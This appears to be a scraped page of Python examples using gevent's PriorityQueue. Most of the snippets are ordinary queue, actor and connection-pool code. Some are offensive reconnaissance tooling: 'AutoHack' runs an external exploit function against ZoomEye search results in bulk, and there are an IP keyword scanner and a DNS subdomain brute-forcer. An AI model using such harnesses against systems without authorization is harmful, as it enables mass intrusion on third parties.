示例#1
0
def test_priority():
    refund_queue = PriorityQueue()
    receipt = TransferReceipt(sender=123, amount=1, identifier=123, received_timestamp=1)

    # higher priority
    refund1 = Refund(receipt, priority=1, claim_fee=False)
    # lower priority
    refund2 = Refund(receipt, priority=5, claim_fee=False)

    assert refund1 > refund2

    refund_queue.put(refund1)
    refund_queue.put(refund2)

    received_first = refund_queue.get()
    received_second = refund_queue.get()

    assert received_first == refund2
    assert received_second == refund1
示例#2
0
    def test_add_to_retry_queue(self, mocked_logger):
        retry_items_queue = PriorityQueue()
        worker = AgreementWorker(config_dict=self.worker_config,
                                 retry_resource_items_queue=retry_items_queue)
        resource_item = {'id': uuid.uuid4().hex}
        priority = 1000
        self.assertEqual(retry_items_queue.qsize(), 0)

        # Add to retry_resource_items_queue
        worker.add_to_retry_queue(resource_item, priority=priority)

        self.assertEqual(retry_items_queue.qsize(), 1)
        priority, retry_resource_item = retry_items_queue.get()
        self.assertEqual((priority, retry_resource_item),
                         (1001, resource_item))

        resource_item = {'id': 0}
        # Add to retry_resource_items_queue with status_code '429'
        worker.add_to_retry_queue(resource_item, priority, status_code=429)
        self.assertEqual(retry_items_queue.qsize(), 1)
        priority, retry_resource_item = retry_items_queue.get()
        self.assertEqual((priority, retry_resource_item),
                         (1001, resource_item))

        priority = 1002
        worker.add_to_retry_queue(resource_item, priority=priority)
        sleep(worker.config['retry_default_timeout'] * 2)
        self.assertEqual(retry_items_queue.qsize(), 1)
        priority, retry_resource_item = retry_items_queue.get()
        self.assertEqual((priority, retry_resource_item),
                         (1003, resource_item))

        worker.add_to_retry_queue(resource_item, priority=priority)
        self.assertEqual(retry_items_queue.qsize(), 0)
        mocked_logger.critical.assert_called_once_with(
            'Tender {} reached limit retries count {} and droped from '
            'retry_queue.'.format(resource_item['id'],
                                  worker.config['retries_count']),
            extra={
                'MESSAGE_ID': 'dropped_documents',
                'JOURNAL_TENDER_ID': resource_item['id']
            })
        del worker
    def test_add_to_retry_queue(self, mocked_logger):
        retry_items_queue = PriorityQueue()
        worker = ResourceItemWorker(
            config_dict=self.worker_config,
            retry_resource_items_queue=retry_items_queue)
        resource_item_id = uuid.uuid4().hex
        priority = 1000
        self.assertEqual(retry_items_queue.qsize(), 0)

        # Add to retry_resource_items_queue
        worker.add_to_retry_queue(resource_item_id, priority=priority)
        # sleep(worker.config['retry_default_timeout'] * 0)
        self.assertEqual(retry_items_queue.qsize(), 1)
        priority, retry_resource_item_id = retry_items_queue.get()
        self.assertEqual(priority, 1001)
        self.assertEqual(retry_resource_item_id, resource_item_id)

        # Add to retry_resource_items_queue with status_code '429'
        worker.add_to_retry_queue(resource_item_id, priority, status_code=429)
        self.assertEqual(retry_items_queue.qsize(), 1)
        priority, retry_resource_item_id = retry_items_queue.get()
        self.assertEqual(priority, 1001)
        self.assertEqual(retry_resource_item_id, resource_item_id)

        priority = 1002
        worker.add_to_retry_queue(resource_item_id, priority=priority)
        sleep(worker.config['retry_default_timeout'] * 2)
        self.assertEqual(retry_items_queue.qsize(), 1)
        priority, retry_resource_item_id = retry_items_queue.get()
        self.assertEqual(priority, 1003)
        self.assertEqual(retry_resource_item_id, resource_item_id)

        worker.add_to_retry_queue(resource_item_id, priority=priority)
        self.assertEqual(retry_items_queue.qsize(), 0)
        mocked_logger.critical.assert_called_once_with(
            'Tender {} reached limit retries count {} and droped from '
            'retry_queue.'.format(resource_item_id,
                                  worker.config['retries_count']),
            extra={'MESSAGE_ID': 'dropped_documents'})
        del worker
示例#4
0
class HttpTest(object):

    def __init__(self,host,keyword,ips,timeout):
        self.threads = 100
        self.queue = PriorityQueue()
        self.host = host
        self.keyword = keyword
        self.result = []
        for ip in ips:
            self.queue.put(ip)
        self.num = self.queue.qsize()
        self.i = 0
        self.success = 0
        self.timeout = timeout
        self.filename = os.path.join(rootPath,"result",host + ".log")
        self.outfile = open(self.filename, 'w')


    def _scan(self,j):
        while not self.queue.empty():
            try:
                item = self.queue.get(timeout=3.0)
                if config.HTTPS_Support:
                    host, domain, port = item, self.host , 443
                else:
                    host, domain, port = item, self.host , 80
                html = httpServer((host, domain, port),self.timeout)
                if html  is not None and self.keyword in html:
                    self.outfile.write(item + '\n')
                    self.outfile.flush()
                    self.success += 1
            except:
                pass
            finally:
                self.i += 1
                msg = '[*] %s found, %s scanned , %s groups left'%(self.success,self.i,self.num - self.i)
                print_msg(msg)
            time.sleep(1.0)

    def run(self):
        threads = [gevent.spawn(self._scan, i) for i in range(self.threads)]
        gevent.joinall(threads)

        msg = '[+] All Done. Success:%d Saved in:%s'%(self.success,self.filename)
        print_msg(msg, line_feed=True)
示例#5
0
class AutoHack():
    def __init__(self, zoomeye_results, threads_num):
        self.threads_num = threads_num
        self.targets = PriorityQueue()
        self.zoomeye_results = zoomeye_results
        self.result = []
        
        for zoomeye_result in zoomeye_results:
            self.targets.put(zoomeye_result)
        self.total = self.targets.qsize()
        self.pbar = tqdm(total=self.total,ascii=True)


    def check(self):
        while self.targets.qsize() > 0:
            target = self.targets.get().strip()
            try:
                self.pbar.update(1)
                result = exp.exp(target)
                if result:
                    self.result.append(result)
            except Exception as e:
                #print(e)
                pass


    def run(self):
        threads = [gevent.spawn(self.check) for i in range(self.threads_num)]
        try:
            gevent.joinall(threads)
        except KeyboardInterrupt as e:
            print ('[WARNING] User aborted')
            for res in self.result:
                print (res)
        self.pbar.close()
        print ("Hack it!")
        for res in self.result:
            print (res)
        print("Found ",len(self.result))
        print ("End!")
示例#6
0
class _Channel(object):
    def __init__(self, from_fsm, to_fsm, tracer, queue=None):
        if queue is None:
            self.queue = PriorityQueue()
        else:
            self.queue = queue
        self.from_fsm = from_fsm
        self.to_fsm = to_fsm
        self.tracer = tracer

    def put(self, priority_order_item):
        priority, order, item = priority_order_item
        self.tracer.send_trace_message(
            messages.ChannelTrace(
                self.tracer.trace_order_seq(),
                self.from_fsm.fsm_id if self.from_fsm else None,
                self.to_fsm.fsm_id if self.to_fsm else None, item.name))
        self.queue.put(priority_order_item)

    def get(self, block=True, timeout=None):
        return self.queue.get(block, timeout)

    receive = get
示例#7
0
class Actor(Greenlet):
    """Simple implementation of the Actor pattern
    """

    def __init__(self):
        self.inbox = PriorityQueue()
        self._handlers = {ShutdownRequest: self.receive_shutdown}
        Greenlet.__init__(self)

    def receive(self, msg):
        """Dispatch a received message to the appropriate type handler
        """
        #log.debug("Received a message: " + repr(msg))
        cls = msg.__class__
        if cls in self._handlers.keys():
            self._handlers[cls](msg)
        else:
            raise NotImplemented()

    def receive_shutdown(self, msg):
        self.running = False

    def send(self, msg, priority=50):
        """Place a message into the actor's inbox
        """
        self.inbox.put((priority, msg))

    def _run(self):
        """Run the Actor in a blocking event loop
        """
        self.running = True

        while self.running:
            prio, msg = self.inbox.get()
            self.receive(msg)
            del msg
示例#8
0
class ZMQEventChannel(object):

    def __init__(self, fsm_registry, connector_registry, configuration):
        self.fsm_registry = fsm_registry
        self.connector_registry = connector_registry
        self.context = zmq.Context.instance()
        self.socket = self.context.socket(zmq.ROUTER)
        if 'bind_port' in configuration:
            self.socket_port = configuration.get('bind_port')
            self.socket.bind('tcp://{0}:{1}'.format(configuration.get('bind_address', '127.0.0.1'),
                                                    self.socket_port))
        else:
            self.socket_port = self.socket.bind_to_random_port('tcp://{0}'.format(configuration.get('bind_address', '127.0.0.1')))
        logger.info('starting zmq_thread')
        self.zmq_thread = gevent.spawn(self.receive_external_messages)
        self.inbox_thread = gevent.spawn(self.receive_internal_messages)
        self.inbox = PriorityQueue()
        self.message_id_seq = count(0)
        self.client_id_seq = count(0)
        self.clients = dict()

    def receive_internal_messages(self):
        while True:
            gevent.sleep(0.1)
            logger.info("Waiting for messages")
            priority, order, message = self.inbox.get()
            message_type = message.name
            logger.info('Received %s', message_type)
            if 'client_id' in message.data and message.data['client_id'] in self.clients:
                #Unicast
                logger.info("Unicasting message to %s aka %r", message.data['client_id'], self.clients[message.data['client_id']])
                msg = [self.clients[message.data['client_id']]]
                msg.extend(messages.serialize(message))
                self.socket.send_multipart(msg)
            else:
                #Broadcast
                logger.info("Broadcasting message to all listening clients")
                for client_id in list(self.clients.values()):
                    msg = [client_id]
                    msg.extend(messages.serialize(message))
                    self.socket.send_multipart(msg)

    def receive_external_messages(self):
        while True:
            to_fsm_id = None
            from_fsm_id = None
            zmq_client_id = None
            logger.info('waiting on recv_multipart')
            message = self.socket.recv_multipart()
            logger.info(repr(message))
            zmq_client_id = message.pop(0)
            client_id = str(next(self.client_id_seq))
            self.clients[client_id] = zmq_client_id
            try:
                msg_type = message.pop(0).decode()
                msg_data = yaml.safe_load(message.pop(0).decode())
                if b'Listening' in message:
                    msg_data['data']['client_id'] = client_id
                logger.info(repr(msg_type))
                logger.info(repr(msg_data))
            except Exception as e:
                self.socket.send_multipart([zmq_client_id, b'Error'])
                logger.error(str(e))
                continue
            if not isinstance(msg_type, str):
                self.socket.send_multipart([zmq_client_id, 'Element 1 should be str was {}'.format(type(msg_type)).encode()])
                logger.error([zmq_client_id, 'Element 1 should be str was {}'.format(type(msg_type)).encode()])
                continue
            if not isinstance(msg_data, dict):
                self.socket.send_multipart([zmq_client_id, 'Element 2 should be a dict was {}'.format(type(msg_data)).encode()])
                logger.error([zmq_client_id, 'Element 2 should be a dict was {}'.format(type(msg_data)).encode()])
                continue
            to_fsm_id = msg_data.get('to_fsm_id', None)
            from_fsm_id = msg_data.get('from_fsm_id', None)
            if not from_fsm_id:
                from_fsm_id = 'zmq'
            if to_fsm_id in self.fsm_registry:
                logger.info('Sending to FSM {} from {}'.format(to_fsm_id, from_fsm_id))
                self.fsm_registry[to_fsm_id].inbox.put((1,
                                                        next(self.fsm_registry[to_fsm_id].message_id_seq),
                                                        messages.Event(from_fsm_id,
                                                                       to_fsm_id,
                                                                       msg_data['name'],
                                                                       msg_data['data'])))

                logger.info('Processed')
                self.socket.send_multipart([zmq_client_id, b'Processed'])
            else:
                logger.info('Not processed')
                self.socket.send_multipart([zmq_client_id, b'Not processed'])
            gevent.sleep(0)
示例#9
0
class FactoryPool(object):
    def __init__(self, factory, maxsize=200, timeout=60):
        self.factory = factory
        self.maxsize = maxsize
        self.timeout = timeout
        self.clients = PriorityQueue(maxsize)
        # If there is a maxsize, prime the queue with empty slots.
        if maxsize is not None:
            for _ in xrange(maxsize):
                self.clients.put(EMPTY_SLOT)

    @contextlib.contextmanager
    def reserve(self):
        """Context-manager to obtain a Client object from the pool."""
        ts, client = self._checkout_connection()
        try:
            yield client
        finally:
            self._checkin_connection(ts, client)

    def _checkout_connection(self):
        # If there's no maxsize, no need to block waiting for a connection.
        blocking = self.maxsize is not None

        # Loop until we get a non-stale connection, or we create a new one.
        while True:
            try:
                ts, client = self.clients.get(blocking)
            except Empty:
                # No maxsize and no free connections, create a new one.
                # XXX TODO: we should be using a monotonic clock here.
                # see http://www.python.org/dev/peps/pep-0418/
                now = int(time.time())
                return now, self.factory()
            else:
                now = int(time.time())
                # If we got an empty slot placeholder, create a new connection.
                if client is None:
                    return now, self.factory()
                # If the connection is not stale, go ahead and use it.
                if ts + self.timeout > now:
                    return ts, client
                # Otherwise, the connection is stale.
                # Close it, push an empty slot onto the queue, and retry.
                if hasattr(client, 'disconnect'):
                    client.disconnect()

                self.clients.put(EMPTY_SLOT)
                continue

    def _checkin_connection(self, ts, client):
        """Return a connection to the pool."""
        if hasattr(client, '_closed') and client._closed:
            self.clients.put(EMPTY_SLOT)
            return

        # If the connection is now stale, don't return it to the pool.
        # Push an empty slot instead so that it will be refreshed when needed.
        now = int(time.time())
        if ts + self.timeout > now:
            self.clients.put((ts, client))
        else:
            if self.maxsize is not None:
                self.clients.put(EMPTY_SLOT)
示例#10
0
class PriorityBlockingQueue(object):
    """
    带优先级的阻塞队列。
    优先级数字越小,优先级越高。

    插入元素:
    * put: 向队列尾部插入一个元素,如果该队列已满,则一直阻塞。
    * offer: 向队列尾部插入一个元素,插入成功返回True。插入失败返回False。

    获取元素:
    * poll: 获取并移除队列的头元素,若队列为空,则返回null。
    * take: 获取并移除队列的头元素,若队列为空,则一直阻塞。
    * peek:获取但不移除队列的头元素,若队列为空,则返回null

    队列状态状态:
    * qsize:获取队列中当前元素数量
    * maxsize:获取队列的最大容量
    """
    def __init__(self, maxsize: int = None):
        """
        init
        :param maxsize: 队列的最大容量
        """
        self.__queue = PriorityQueue(maxsize=maxsize)

    def put(self, item, priority: int = 200) -> None:
        """
        向队列尾部插入一个元素,如果该队列已满,则一直阻塞。
        :param item:
        :param priority: 优先级
        :return:
        """
        while True:
            try:
                self.__queue.put(PriorityEntry(priority, item))
                break
            except Exception as e:
                logger.debug("put data failed error -> {0}".format(e))
            time.sleep(0.5)

    def offer(self, item, priority: int = 200) -> bool:
        """
        向队列尾部插入一个元素,插入成功返回True。插入失败返回False。
        :param item: 元素
        :param priority: 优先级
        :return:
        """
        try:
            self.__queue.put(PriorityEntry(priority, item), block=False)
            return True
        except Exception as e:
            logger.debug("offer data failed error -> {0}".format(e))
        return False

    def poll(self):
        """
        获取并移除队列的头元素,若队列为空,则返回null。
        :return:
        """
        try:
            return self.__queue.get(block=False).data
        except Exception as e:
            logger.debug("poll data failed error -> {0}".format(e))
        return None

    def take(self):
        """
        获取并移除队列的头元素,若队列为空,则一直阻塞。
        :return:
        """
        while True:
            try:
                return self.__queue.get().data
            except Exception as e:
                logger.debug("take data failed error -> {0}".format(e))
            time.sleep(0.5)

    def peek(self):
        """
        获取但不移除队列的头元素,若队列为空,则返回null
        :return:
        """
        try:
            return self.__queue.peek(block=False).data
        except Exception as e:
            logger.debug("peek data failed error -> {0}".format(e))
        return None

    def qsize(self) -> int:
        """
        获取队列中当前元素数量
        :return:
        """
        return self.__queue.qsize()

    def maxsize(self) -> int:
        """
        获取队列的最大容量
        :return:
        """
        return self.__queue.maxsize
示例#11
0
# -*- coding: utf-8 -*-
"""
优先级队列测试
"""

from gevent.queue import PriorityQueue

tasks = PriorityQueue()

tasks.put((3, '3'))
tasks.put((5, '5'))
tasks.put((1, '1'))

print tasks.get()
print tasks.get()
print tasks.get()
示例#12
0
class FSMController(object):
    def __init__(self, name, fsm_id, states, initial_state, tracer,
                 channel_tracer, fsm_registry, fsm_id_seq, inventory,
                 play_header, outputs):
        self.shutting_down = False
        self.is_shutdown = False
        self.fsm_registry = fsm_registry
        self.name = name
        self.fsm_id = fsm_id
        self.tracer = tracer
        self.channel_tracer = channel_tracer
        self.state = initial_state
        self.states = states
        self.inbox = PriorityQueue()
        self.message_buffer = Queue()
        self.self_channel = Channel(self, self, tracer, self.inbox)
        self.worker = AnsibleTaskWorker(tracer, next(fsm_id_seq), inventory,
                                        play_header)
        self.worker_output_queue = Queue()
        self.worker.controller.outboxes['output'] = self.worker_output_queue
        self.worker.queue.put(Inventory(0, inventory))
        self.outboxes = dict(default=None)
        self.last_event = NULL_EVENT
        self.task_id_seq = count(0)
        self.failure_count = 0
        if outputs:
            self.outboxes.update({name: None for name in outputs})
        self.thread = gevent.spawn(self.receive_messages)

    def enter(self):
        self.state.exec_handler(self, 'enter', NULL_EVENT)

    def change_state(self, state, handling_message_type):
        if self.state:
            self.state.exec_handler(self, 'exit', NULL_EVENT)
        if settings.instrumented:
            self.tracer.send_trace_message(
                messages.FSMTrace(self.tracer.trace_order_seq(), self.name,
                                  self.fsm_id, self.state.name, state.name,
                                  handling_message_type))
        self.state = state
        if self.state:
            self.state.exec_handler(self, 'enter', NULL_EVENT)

    def handle_message(self, message_type, message):
        self.state.exec_handler(self, message_type, message)

    def shutdown(self):
        self.shutting_down = True
        if self.is_shutdown:
            return
        self.worker.queue.put(ShutdownRequested())
        for _ in range(10):
            gevent.sleep(1)
            worker_message = self.worker_output_queue.get()
            if isinstance(worker_message, ShutdownComplete):
                break
        self.is_shutdown = True

    def receive_messages(self):

        while not self.shutting_down:
            gevent.sleep(0.1)
            logger.info("Waiting for messages")
            priority, order, message = self.inbox.get()
            if self.shutting_down:
                logger.info("Ignoring message due to shutdown")
                break
            message_type = message.name
            if message_type == 'Shutdown':
                logger.info("Shutting down")
                self.shutdown()
                break
            elif message_type == 'ChangeState' and self.state.name != message.data[
                    'current_state']:
                logger.info(
                    "Ignoring ChangeState message because the current state does not match"
                )
            elif message_type == 'ChangeState' and self.state.name == message.data[
                    'current_state']:
                logger.info("Changing state")
                self.change_state(self.states[message.data['next_state']],
                                  message.data['handling_message_type'])
            else:
                logger.info("Handling message {}".format(message_type))
                self.handle_message(message_type, message)
示例#13
0
class SubNameBrute:
    def __init__(self, target, options):
        # 设置优先级
        self.queue = PriorityQueue()
        self.priority = 0

        # 根据参数进行基本设置
        self.target = target.strip()
        self.options = options
        self.ignore_intranet = options.get('ignore_intranet')

        # 是否用大字典
        if self.options.get('subnames_full'):
            outfile_name+='_sfull'
        if self.options.get('next_sub_full'):
            outfile_name += '_nfull'

        # 根据主域名确定结果文件名称
        outfile_name = options.get('file') if options.get('file') else(target)
        self.fname = 'results/'+outfile_name+'.txt'
        self.outfile = open('results/'+outfile_name+'.txt', 'wb')
        self.outfile_ips = open('results/'+outfile_name+'_ip.txt', 'w')

        # 设置dns解析器 (根据预设的线程数量初始化dns resolver)
        # QUESTION: configure = False还是不太明白 为什么要不以/etc/resolv.conf的常规常规配置??
        self.resolvers = [dns.resolver.Resolver(configure=False) for _ in range(options.get('threads'))]
        for _ in self.resolvers:
            '''
            dns.resolver.Resolver: http://www.dnspython.org/docs/1.14.0/dns.resolver.Resolver-class.html
            dns.resolver.Resolver.lifetime: The total number of seconds to spend trying to get an answer to the question.
            dns.resolver.Resolver.timeout: The number of seconds to wait for a response from a server, before timing out.
            '''
            # QUESTION:lifetime 与 timeout 什么区别?
            _.lifetime = _.timeout = 10.0

        # 加载dns服务器列表
        self._load_dns_servers()
        # self.ex_resolver是备用的在出现except时使用的dns_resolver
        self.ex_resolver = dns.resolver.Resolver(configure=False)
        self.ex_resolver.nameservers = self.dns_servers
        self.logfile = open('results/'+target+'_log.txt','a')

        #set subdomain dct set
        self._load_next_sub()
        self._load_sub_names()

        #set init paras
        self.start_time = time.time()
        self.scan_count = 0
        self.found_count = 0 # 已验证过存在子域名的前缀
        self.STOP_ME = False
        self.ip_dict = {}
        self.found_subs = set()

    def _load_dns_servers(self):
        """
        功能:导入可用的名称服务器 (init初始化时执行)
        :return:
        """
        print '[+] Validate DNS servers ...'
        self.dns_servers = []
        pool = Pool(30)
        for server in open('dns_servers.txt').xreadlines():#xreadlines返回一个生成器
            server = server.strip()
            if server:
                # apply_async 并行
                pool.apply_async(self._test_server, (server,))#apply_async(func[, args[, kwds[, callback]]]) 它是非阻塞
        pool.join()#主进程阻塞,等待子进程的退出
        self.dns_count = len(self.dns_servers)
        sys.stdout.write('\n')
        print '[+] Found %s available DNS Servers in total' % self.dns_count
        if self.dns_count == 0:
            print '[ERROR] No DNS Servers available.'
            sys.exit(-1)

    def _test_server(self, server):
        '''
        功能:检测dns服务器是否可用(_load_dns_servers()在加载dns列表时会探测)
            检测思路:1.已存在域名可成功解析出ip;
                    2.不存在的域名解析则会出错.
        :param server:nameserver
        :return: 无
        '''
        resolver = dns.resolver.Resolver()
        resolver.lifetime = resolver.timeout = 10.0
        try:
            resolver.nameservers = [server]
            existed_domain = 'public-dns-a.baidu.com'
            corrs_ip = '180.76.76.76'
            answers = resolver.query(existed_domain)
            if answers[0].address != corrs_ip:
                raise Exception('incorrect DNS response')
            try:
                non_existed_domain = 'test.bad.dns.lijiejie.com'
                resolver.query(non_existed_domain)
                print '[+] Bad DNS Server found %s' % server
            except:
                self.dns_servers.append(server)
            print '[+] Check DNS Server %s < OK >   Found %s' % (server.ljust(16), len(self.dns_servers))
        except:
            print '[+] Check DNS Server %s <Fail>   Found %s' % (server.ljust(16), len(self.dns_servers))


    def _get_filename(self,option,is_full):
        '''
        功能:构造要打开字典文件的目录
        param: option: 字典的类型 subnames / next_sub
        param: is_full: 决定使用大字典还是小字典
        return: _file: 当前要加载字典的路径
        '''
        has_newdct = self.options.get('new_dct')
        if has_newdct:
            try:
                # 有新字典文件名,则加载新的字典
                next_sub,subnames = has_newdct.split(',')
            except Exception:
                print '[ERROR] Names file not exists: %s' % has_newdct
                exit(-1)
            else:
                # 若新字典名next_sub,subnames加载异常,则打开原来的字典
                self.new_filenames = {
                    'next_sub':'dict/'+next_sub,
                    'subnames':'dict/'+subnames
                }
                filename = self.new_filenames.get(option)
                if os.path.exists(filename):
                    _file = filename
                else:
                    print '[ERROR] Names file not exists: %s' % filename
                    exit(-1)
        elif is_full:
            _file = 'dict/'+option+'_full.txt'
        else:
            _file = 'dict/'+option+'.txt'

        return _file

    def _load_sub_names(self):

        print '[+] Load sub names ...'
        is_full = self.options.get('subnames_full')
        # _file是完整的路径名
        _file = self._get_filename('subnames',is_full)
        normal_lines = []
        wildcard_list = []
        regex_list = []
        lines = set()
        with open(_file) as f:
            wildcard_lines = []
            for line in f.xreadlines():
                sub = line.strip()
                print 'sub:' + sub
                if not sub or sub in lines:
                    continue
                lines.add(sub)
                # 通配符
                # QUESTION:但实际的sub文件中都没有通配符????
                if sub.find('{alphnum}') >= 0 or sub.find('{alpha}') >= 0 or sub.find('{num}') >= 0:
                    # 如果存在某个通配符,则先将其加入到wildcard_lines
                    wildcard_lines.append(sub)
                    sub = sub.replace('{alphnum}', '[a-z0-9]')
                    sub = sub.replace('{alpha}', '[a-z]')
                    sub = sub.replace('{num}', '[0-9]')
                    print 'sun2: ' + sub
                    if sub not in wildcard_list:
                        # QUESTION:为什么替换通配符后还要加入到wildcard_list??
                        wildcard_list.append(sub)
                        regex_list.append('^' + sub + '$')
                else:
                    # 不存在通配符的加入到normal_lines
                    normal_lines.append(sub)
        pattern = '|'.join(regex_list)
        if pattern:
            _regex = re.compile(pattern)
            if _regex:
                for line in normal_lines[:]:
                    if _regex.search(line):
                        normal_lines.remove(line)

        for item in normal_lines:
            # QUESTION: 为什么遍历时每次要令priority自增?
            self.priority = self.priority+1
            self.queue.put((self.priority, item))

        for item in wildcard_lines:
            # QUESTION: wildcard_lines中元素含有通配符所以优先级低???(大数对应低优先级)
            self.queue.put((88888888, item))

    def _load_next_sub(self):
        """
        枚举一、二位子域并添加已存子域
        :return:
        """
        self.next_subs = []
        _set = set()
        is_full = self.options.get('next_sub_full')
        #  _file是nett_sub完整的路径
        _file = self._get_filename('next_sub',is_full)
        with open(_file) as f:
            for line in f:
                sub = line.strip()
                if sub and sub not in self.next_subs:
                    #  利用{alphnum}等通配符组合新的子串
                    # QUESTION:但原文件中的其他子串没有用?
                    tmp_set = {sub} # 相当于tep_set = set(sub)
                    while len(tmp_set) > 0:
                        item = tmp_set.pop()
                        # print 'item: ' + item
                        if item.find('{alphnum}') >= 0:
                            for _letter in 'abcdefghijklmnopqrstuvwxyz0123456789':
                            # for _letter in 'ab89':
                                # 如果是{alphnum}{alphnum},则将'abcdefghijklmnopqrstuvwxyz0123456789' 两两组合的结果加入了tmp_set
                                tt = item.replace('{alphnum}', _letter, 1)
                                tmp_set.add(tt)
                        elif item.find('{alpha}') >= 0:
                            for _letter in 'abcdefghijklmnopqrstuvwxyz':
                                tmp_set.add(item.replace('{alpha}', _letter, 1))
                        elif item.find('{num}') >= 0:
                            for _letter in '0123456789':
                                tmp_set.add(item.replace('{num}', _letter, 1))
                        elif item not in _set:
                            # 当所有的{alphnum}等通配符都被replace完后,将被加入到_set / self.next_subs
                            # 原文件中不包括通配符的子串直接加入了_set,也加入了self.next_subs
                            _set.add(item)
                            self.next_subs.append(item)


    @staticmethod
    # 判断是否是内网ip
    def is_intranet(ip):
        ret = ip.split('.')
        if len(ret) != 4:
            return True
        if ret[0] == '10':
            return True
        if ret[0] == '172' and 16 <= int(ret[1]) <= 32:
            return True
        if ret[0] == '192' and ret[1] == '168':
            return True
        return False

    def put_item(self, item):
        # 向待检测前缀队列self.queue中添加新的子域名前缀
        num = item.count('{alphnum}') + item.count('{alpha}') + item.count('{num}')
        if num == 0:
            self.priority += 1
            self.queue.put((self.priority, item))
        else:
            # 存在通配符则将优先级设为低级
            self.queue.put((self.priority + num * 10000000, item))

    def _universal_parsing(self,sub,ips):
        # 统计数量,与泛解析有关
        _sub = sub.split('.')[-1]
        # (_sub,ips)前缀与该前缀构成的子域名所得ip QUESTION:这和泛解析什么关系???
        '''
        a.b.baidu.com 与 a.baidu.com ,它们的_sub都是'a.',当他们解析到相同的A记录时,
        则有可能其他_sub同为'a.'(最左侧一级为a.)的子域名也会解析到同样的ip,存在泛解析
        '''
        if (_sub, ips) not in self.ip_dict:
            self.ip_dict[(_sub, ips)] = 1
        else:
            self.ip_dict[(_sub, ips)] += 1

        # 计数:一组ips被多少个sub解析到  (如果一组ips被多组sub解析到,则可能是泛解析)
        if ips not in self.ip_dict:
            self.ip_dict[ips] = 1
        else:
            self.ip_dict[ips] += 1

        return True if self.ip_dict[(_sub, ips)] > 3 or self.ip_dict[ips] > 6 else(False)

    def _validate_subdomain(self,j,sub):
        '''
           功能:验证子域名是否存在
        '''

        # 构造新的子域名
        subdmname = sub + '.' + self.target

        try:
            answers = self.resolvers[j].query(subdmname)
        except dns.resolver.NoAnswer:
            try:
                # 出现异常则用备用dns解析器解析
                answers = self.ex_resolver.query(subdmname)
            except dns.resolver.NoAnswer:
                # 如果2次都出现异常,则返回False
                return False
        if answers:
            # 如果得到响应,则将该前缀加入到self.found_subs
            # QUESTION: 验证说明不存在的不用单独存下来吗
            self.found_subs.add(sub)
            # 得到A记录集合
            ips = ', '.join(sorted([answer.address for answer in answers]))
            print ips
            self.cur_ips = ips
            # QUESTION: 只有一个ip且ip是一下其中之一的情况
            if ips in ['1.1.1.1', '127.0.0.1', '0.0.0.0']:
                return False
            #除去内网域名
            # self.ignore_instanet表示是否要进行内网ip过滤
            # SubNameBrute.is_intranet(answers[0].address) 是实际进行是否是内外ip的测算
            # QUESTION: 为什么只对answers[0]中的ip进行测试???
            if self.ignore_intranet and SubNameBrute.is_intranet(answers[0].address):
                return False
            # 泛解析
            if self._universal_parsing(sub, ips):
                return False
        else:
            return False

        return True

    def _scan_cname(self,j,subdmname):
        '''
        功能:检测子域名的cname是否是新的子域名,是否可以得到新的前缀
        '''
        try:
            self.scan_count += 1
            # subdmname是已经验证有效的子域名,现获取其cname
            answers = self.resolvers[j].query(subdmname, 'cname')
            cname = answers[0].target.to_unicode().rstrip('.')
            # cname.endswith(self.target)判断cname是不是子域名
            if cname.endswith(self.target) and cname not in self.found_subs:
                # 将是子域名的cname加入到self.found_subs

                self.found_subs.add(cname)
                # 假设cname是'www.a.shifen.com',target是'shifen.com',,则cname_sub是'www.a'
                # 当cname是子域时,将i其前缀再次加入队列,当此前缀在不同级上时,可能构成新的子域
                cname_sub = cname[:len(cname) - len(self.target) - 1]  # new sub
                self.queue.put((0, cname_sub))
        except:
            pass

    def _scan(self, j):
        # 具体运行的核心函数
        self.resolvers[j].nameservers = [self.dns_servers[j % self.dns_count]]

        while not self.queue.empty():
            try:
                # 从队列中获得一个前缀
                item = self.queue.get(timeout=1.0)[1]
                self.scan_count += 1
            except:
                break
            try:
                # 根据_load_sub_names代码,会有包含通配符的sub被加入了queue,因此这里要进行处理
                if item.find('{alphnum}') >= 0:
                    for _letter in 'abcdefghijklmnopqrstuvwxyz0123456789':
                        self.put_item(item.replace('{alphnum}', _letter, 1))
                    continue
                elif item.find('{alpha}') >= 0:
                    for _letter in 'abcdefghijklmnopqrstuvwxyz':
                        self.put_item(item.replace('{alpha}', _letter, 1))
                    continue
                elif item.find('{num}') >= 0:
                    for _letter in '0123456789':
                        self.put_item(item.replace('{num}', _letter, 1))
                    continue
                elif item.find('{next_sub}') >= 0:
                    for _ in self.next_subs:
                        self.queue.put((0, item.replace('{next_sub}', _, 1)))
                    continue
                else:
                    sub = item

                # 如果是已经验证过的,则不进行验证处理
                if sub in self.found_subs:
                    continue

                if self._validate_subdomain(j,sub):
                    cur_sub_domain = sub+'.'+self.target
                    self._scan_cname(j,cur_sub_domain) # 检测子域名的cname中是否包含子域名
                    self.found_count += 1
                    # QUESTON
                    self.outfile.write(cur_sub_domain+'\n')
                    '''
                    关于flush与write:http://blog.csdn.net/fenfeiqinjian/article/details/49444973
                        一般的文件流操作都包含缓冲机制,write方法并不直接将数据写入文件,而是先写入内存中特定的缓冲区。
                        flush方法是用来刷新缓冲区的,即将缓冲区中的数据立刻写入文件,同时清空缓冲区
                        正常情况下缓冲区满时,操作系统会自动将缓冲数据写入到文件中。
                        至于close方法,原理是内部先调用flush方法来刷新缓冲区,再执行关闭操作,这样即使缓冲区数据未满也能保证数据的完整性。
                        如果进程意外退出或正常退出时而未执行文件的close方法,缓冲区中的内容将会丢失
                    '''
                    self.outfile.flush()
                    self.outfile_ips.write(self.cur_ips+'\n')
                    self.outfile_ips.flush()
                    print cur_sub_domain
                    # '{next_sub}.' + sub 目的在于给当前前缀再增加前缀,以构成多级域名
                    self.queue.put((999999999, '{next_sub}.' + sub))

            except (dns.resolver.NXDOMAIN, dns.name.EmptyLabel):
                pass
            except (dns.resolver.NoNameservers, dns.resolver.NoAnswer, dns.exception.Timeout):
                pass
            except Exception:
                pass
            print "scan_count=%s,found_count=%s"%(self.scan_count,self.found_count)

    def run(self):
        # i用来标识是第几个写成,同时在协程中用来选择dns resolver
        threads = [gevent.spawn(self._scan, i) for i in range(self.options.get('threads'))]

        try:
            gevent.joinall(threads)
        except KeyboardInterrupt:
            print '[WARNING] User aborted.'

        self.end_time = time.time()
        s = (self.end_time-self.start_time)
        m = ((self.end_time - self.start_time)/60)
        h = ((self.end_time - self.start_time) / 3600)

        self.logfile.write(self.fname+'\n')
        result = "scan_count=%s,found_count=%s"%(self.scan_count,self.found_count)
        self.logfile.write(result+'\n')
